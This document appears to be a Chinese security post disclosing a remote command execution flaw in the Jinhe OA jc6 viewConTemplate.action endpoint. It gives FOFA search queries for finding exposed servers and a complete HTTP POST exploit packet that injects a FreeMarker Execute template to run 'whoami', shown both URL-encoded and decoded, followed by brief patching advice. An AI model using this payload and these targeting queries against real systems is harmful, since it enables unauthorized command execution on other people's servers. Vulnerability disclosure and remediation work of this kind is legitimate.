免责声明
文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述
金和OA viewConTemplate.action存在远程命令执行漏洞。攻击者可能通过精心构造的输入数据,在未经适当授权的情况下执行任意恶意代码指令。
影响范围
金和OA jc6
资产测绘
FOFA:
app="金和网络-金和OA"
body="JHSoft.Web.AddMenu"
body="/jc6/platform/"
body="/jc6/platform/sys/login"
漏洞复现
漏洞数据包:
POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 152
Content-Type: application/x-www-form-urlencoded
moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522whoami%2522%29%257D%253C%252Fclob%253E&uuid=1
moduId=1&code=<clob>${"freemarker.template.utility.Execute"?new()("whoami")}</clob>&uuid=1
修复建议
1、加强输入安全控制:
对viewConTemplate.action处理的所有用户可操控参数执行严格的验证与过滤措施,确保任何可能含有恶意系统命令或特殊字符的数据均被有效拦截和净化,从而消除远程命令执行的风险。
2、及时应用安全更新:
确认并获取金和OA官方发布的针对viewConTemplate.action漏洞的安全补丁或版本升级,立即执行升级操作以提升系统的安全性,修复已知的远程命令执行漏洞。